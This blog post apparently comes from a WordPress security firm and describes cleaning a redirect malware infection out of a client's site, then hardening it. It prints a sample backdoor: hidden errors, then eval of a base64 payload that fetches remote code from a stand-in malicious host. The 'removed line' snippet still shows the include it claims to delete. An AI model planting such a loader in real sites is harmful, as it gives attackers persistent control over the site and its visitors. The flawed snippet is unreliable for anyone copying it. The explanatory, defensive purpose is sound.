How We Detected and Removed Malware from a Client’s WordPress Site After a Malicious Redirect
Recently, we encountered a severe security breach on a client’s WordPress site, where visitors were being redirected to malicious websites. After a thorough investigation, we found that a hacker had injected malware directly into the WordPress core files. In this blog post, we’ll walk you through what happened, the code responsible for the attack, and the steps we took to clean up the site and secure it for the future.
Symptoms of the Attack
The client first noticed the problem when users reported being redirected to suspicious websites. The site’s SEO performance also began to drop, as search engines flagged it for harmful behavior. It was clear that the site had been compromised by malware, likely intended to steal traffic or infect users with malicious content.
How We Found the Malware
Our investigation started by examining the site’s critical WordPress files, focusing particularly on wp-config.php and the core wp-includes directory, as these are common targets for attackers.
While inspecting the wp-config.php file, we found a suspicious line that had been added to the configuration file:
[php]
include_once(ABSPATH . WPINC . '/header.php');
[/php]
This line instructs WordPress to include and execute code from a header.php file located in the wp-includes directory. However, WordPress does not normally have a header.php file in this directory, which immediately raised a red flag. This file was created by the attacker to insert malicious code that would run every time a page on the site was loaded.
Analyzing the Malicious Code
When we checked the contents of the wp-includes/header.php file, we discovered it was designed to:
- Redirect visitors to external malicious websites.
- Execute remote code by fetching additional payloads from the attacker’s server.
- Create a backdoor that allowed the attacker to regain access, even if their code was removed.
This type of attack is particularly dangerous because it compromises both the site owner’s reputation and the security of visitors.
Here’s a simplified example of what the code in header.php might have looked like:
[php]
<?php
// Suppress errors to avoid detection
@ini_set('display_errors', 0);
error_reporting(0);
// Base64-encoded payload used to hide malicious code
$payload = "Z2V0X2ZpbGVfY29udGVudHMoJ2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tL2NvbW1hbmQuanNvbicpOw==";
// Decode and execute the payload
eval(base64_decode($payload));
?>
[/php]
In this case, the eval() function is used to execute code that has been base64-encoded, which makes it harder to detect by security software. The encoded string could contain anything, but it often includes commands to download further malware or redirect users to another site.
How We Cleaned the Infection
1. Removing the Malicious Code
We started by removing the malicious include_once line from the wp-config.php file:
[php]
<?php
// Removed this line to prevent loading malicious code
include_once(ABSPATH . WPINC . '/header.php');
?>
[/php]
Next, we deleted the header.php file from the wp-includes directory, as this file was not part of the official WordPress installation and contained the malicious payload.
2. Checking for Additional Backdoors
Malware infections often come with multiple backdoors, so we searched the site’s directories for other suspicious files. We used the following terminal command to find any other hidden files or recently modified files:
[sourcecode language=”plain”]
find . -type f -name ".*" -o -mtime -30
[/sourcecode]
This command helped us identify any files modified in the last 30 days and any hidden files (starting with a dot .) that attackers might have placed.
3. Verifying WordPress Core Integrity
We used WordPress’s built-in functionality to verify the integrity of the core files. This command checks for any tampered WordPress files and lets us know if we need to replace any of them:
[sourcecode language=”plain”]
wp core verify-checksums
[/sourcecode]
Any core files that were modified were replaced with clean versions from the official WordPress repository.
4. Updating Passwords and Credentials
Because the attacker had gained access to the server, we took the following steps to secure the site:
- Updated all passwords (WordPress admin, database, FTP).
- Updated the database credentials in
wp-config.phpto ensure the attacker could no longer access the database. - Enabled two-factor authentication (2FA) for WordPress logins to add an extra layer of security.
5. Hardened WordPress Security
To prevent future attacks, we took several steps to harden the WordPress installation:
- Installed a security plugin like Wordfence or iThemes Security to monitor for malicious activity.
- Disabled file editing within the WordPress dashboard by adding the following line to
wp-config.php:
[php]
define('DISALLOW_FILE_EDIT', true);
[/php]
- Ensured that all themes, plugins, and WordPress core were up to date.
6. Monitoring for Future Attacks
Finally, we set up monitoring to track any further suspicious behavior. We also set up regular backups so that if anything happens in the future, we can restore the site quickly.
Conclusion
This incident was a clear reminder that website security should never be taken lightly. Malware infections like this not only hurt SEO and user trust but can also lead to data breaches. By regularly monitoring your site, keeping everything up to date, and using security best practices, you can minimize the chances of an attack.
If your site has been compromised or you’re seeing strange redirects, don’t wait! Take action immediately to clean your site and prevent further damage. If you’re unsure how to proceed, seek professional help to ensure everything is properly cleaned and secured.
Stay safe and secure!
Need help with your WordPress security? Contact us today for a comprehensive security audit and cleanup service.
Next Generation WordPress
